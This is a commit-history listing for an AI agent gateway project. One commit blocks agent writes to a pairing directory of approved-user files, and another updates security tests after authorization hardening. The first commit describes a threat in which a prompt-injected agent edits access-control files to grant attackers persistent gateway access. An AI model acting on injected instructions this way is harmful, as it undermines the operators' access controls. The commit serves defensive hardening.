AhmetArif0	4f4e337c47	fix(file-safety): write-deny pairing/ directory to prevent approved-list injection The gateway pairing directory (~/.hermes/pairing/) stores per-platform access-control files (telegram-approved.json, discord-approved.json, etc.). A prompt-injected agent using write_file could add arbitrary user IDs to an approved file, granting persistent gateway access without going through the pairing code flow — the same threat class that motivated protecting webhook_subscriptions.json (#14157). The pairing directory was not included in the original control-plane protection because it postdates PR #14157. PR #30383 introduced the hashed-pending schema and made the approved files the sole source of truth for gateway access, raising the security sensitivity of the directory. Apply the same mcp-tokens pattern: block writes to pairing/ and any path within it, under both the active hermes_home and the root path (for profile-mode parity with the fix in #30382). Regression tests verify denial for pairing/telegram-approved.json, pairing/discord-pending.json, and the directory itself, in both normal and profile-mode layouts.	2026-05-24 16:15:33 -07:00
Teknium	889903f0fa	fix(tests): align CI tests with recent security hardening (#31470 ) Four recent security PRs landed on main with stale/missing test updates, breaking 4 test shards on every subsequent PR's CI run: - test_discord_bot_auth_bypass.py (PR #30742 `c3caca658`): DISCORD_ALLOWED_ROLES no longer bypasses _is_user_authorized. Inverted 3 tests to assert the new (correct) behavior: role config alone does NOT authorize at the gateway layer. - test_msgraph_webhook.py (PR #30169 `4ca77f105`): adapter.is_connected is a @property, not a method. Test was calling it with () after the connect() change; TypeError: 'bool' is not callable. Removed the parens. - test_feishu_approval_buttons.py (PR #30744 `bdb97b857`): Card-action callbacks now go through _allow_group_message authorization. 3 tests in TestCardActionCallbackResponse didn't populate adapter._allowed_group_users so the operator's open_id got rejected. Added the allowlist setup to each test, matching the existing pattern in test_returns_card_for_approve_action. Also raise tolerance on test_wait_for_process_kills_subprocess_on_keyboardinterrupt: the SIGTERM → 3s TimeoutStopSec → SIGKILL → reap chain can exceed 10s under loaded xdist (40 workers). Bumped _wait_for_pgid_exit timeout 10→30s and worker join timeout 5→15s. Passes 100% in isolation already; this just makes it tolerant of CI-host load. Validation: 270/270 tests pass across the 5 affected files.	2026-05-24 06:54:16 -07:00

1 2 3 4 5 ...

958 commits